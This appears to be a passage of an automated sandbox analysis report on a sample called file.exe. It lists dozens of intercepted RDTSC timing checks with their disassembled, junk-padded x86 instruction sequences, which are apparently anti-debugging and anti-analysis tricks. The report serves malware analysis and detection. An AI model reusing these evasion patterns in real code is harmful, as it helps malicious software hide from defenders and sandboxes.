                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F90155 second address: F90162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F0A9 second address: F8F0C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F230C515288h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F265 second address: F8F26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F26B second address: F8F26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F26F second address: F8F281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F6C1 second address: F8F6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F6C8 second address: F8F6DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F230C5197ACh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F6DA second address: F8F6E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8F6E0 second address: F8F72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jo 00007F230C5197A6h 0x0000000d jmp 00007F230C5197ACh 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 jmp 00007F230C5197ACh 0x0000001b pushad 0x0000001c jmp 00007F230C5197B7h 0x00000021 jng 00007F230C5197A6h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a push ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8FA12 second address: F8FA19 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8FA19 second address: F8FA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8FA22 second address: F8FA44 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F230C515285h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8FA44 second address: F8FA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F230C5197A6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93317 second address: F9331B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9331B second address: F9331F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9331F second address: F9332D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F230C515276h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9332D second address: F9336A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F230C5197A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 258A746Eh 0x00000012 mov dx, ax 0x00000015 push 00000003h 0x00000017 push 00000000h 0x00000019 mov edx, esi 0x0000001b push 00000003h 0x0000001d call 00007F230C5197A9h 0x00000022 pushad 0x00000023 jmp 00007F230C5197B2h 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b pop eax 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9336A second address: F93380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93380 second address: F93399 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93399 second address: F93423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jo 00007F230C515280h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 jbe 00007F230C515276h 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 jmp 00007F230C515285h 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 push eax 0x0000002a jp 00007F230C515278h 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 pop eax 0x00000033 pop eax 0x00000034 mov edx, dword ptr [ebp+122D37AAh] 0x0000003a lea ebx, dword ptr [ebp+124451E2h] 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007F230C515278h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 00000014h 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a jmp 00007F230C515289h 0x0000005f push eax 0x00000060 pushad 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F93423 second address: F9342B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F935CA second address: F935CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F936D7 second address: F936E1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F230C5197A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB339F second address: FB33AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F230C515276h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB33AE second address: FB33B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB33B2 second address: FB33F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515285h 0x00000007 jmp 00007F230C515287h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F230C51527Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB33F1 second address: FB33F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB10F9 second address: FB1131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F230C515276h 0x0000000a popad 0x0000000b jmp 00007F230C515283h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F230C515287h 0x00000019 jmp 00007F230C515281h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1131 second address: FB113A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB113A second address: FB1143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1143 second address: FB1149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB127B second address: FB1285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1285 second address: FB128F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F230C5197A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB128F second address: FB1295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1295 second address: FB12BB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F230C5197AEh 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007F230C5197A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F230C5197B4h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB12BB second address: FB12DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F230C51527Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB16E5 second address: FB1725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F230C5197B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F230C5197B8h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1725 second address: FB1738 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C51527Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1D20 second address: FB1D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B1h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1FDF second address: FB1FEF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F230C515276h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1FEF second address: FB2009 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197ADh 0x00000007 jns 00007F230C5197A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2009 second address: FB2025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F230C515282h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2191 second address: FB2195 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2195 second address: FB219B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB22BB second address: FB22D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197ABh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB22D1 second address: FB22D7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB22D7 second address: FB2302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jmp 00007F230C5197B1h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA644C second address: FA645B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 jnl 00007F230C515276h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2A94 second address: FB2ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F230C5197A6h 0x0000000d jmp 00007F230C5197B9h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2ABA second address: FB2ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2ABE second address: FB2AC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2C1C second address: FB2C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2C24 second address: FB2C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB31E8 second address: FB3230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jno 00007F230C51528Bh 0x0000000d jo 00007F230C515290h 0x00000013 jmp 00007F230C515288h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3230 second address: FB325C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F230C5197A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F230C5197BDh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB325C second address: FB3262 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3262 second address: FB3266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA023 second address: FBA02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA2C5 second address: FBA2DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F230C5197B4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA2DD second address: FBA2FD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F230C515284h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA2FD second address: FBA323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F230C5197ACh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBA323 second address: FBA32D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F230C51527Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEA7A second address: FBEA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197B3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEA91 second address: FBEA9E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F230C515276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEA9E second address: FBEAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F230C5197AEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE188 second address: FBE1BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jc 00007F230C515276h 0x00000012 jmp 00007F230C515285h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE300 second address: FBE315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197AFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE315 second address: FBE334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F230C51527Ch 0x0000000b jbe 00007F230C515276h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE600 second address: FBE606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1F60 second address: FC1F69 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1F69 second address: FC1FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 add dword ptr [esp], 5454921Bh 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F230C5197A8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 jmp 00007F230C5197ADh 0x0000002c call 00007F230C5197A9h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F230C5197AFh 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC1FBD second address: FC1FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2442 second address: FC2460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197B9h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2C0F second address: FC2C22 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007F230C515276h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2C22 second address: FC2C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jg 00007F230C5197A6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2CC5 second address: FC2CED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515283h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jno 00007F230C515276h 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F230C515276h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2DE6 second address: FC2DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5099 second address: FC509F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC509F second address: FC50F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F230C5197B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007F230C5197A6h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F230C5197B5h 0x00000019 popad 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F230C5197ABh 0x00000022 jmp 00007F230C5197AFh 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC69D1 second address: FC69E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b je 00007F230C515276h 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC69E3 second address: FC69E8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC759B second address: FC759F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC759F second address: FC75A9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F230C5197A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8032 second address: FC803A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8B25 second address: FC8B29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC8B29 second address: FC8B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA133 second address: FCA179 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c xor di, 1B89h 0x00000011 mov si, cx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D1AA0h], esi 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F230C5197B1h 0x00000027 jc 00007F230C5197A6h 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC99B second address: FCC9A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9ECA second address: FC9ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC9A1 second address: FCC9A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9ECE second address: FC9ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
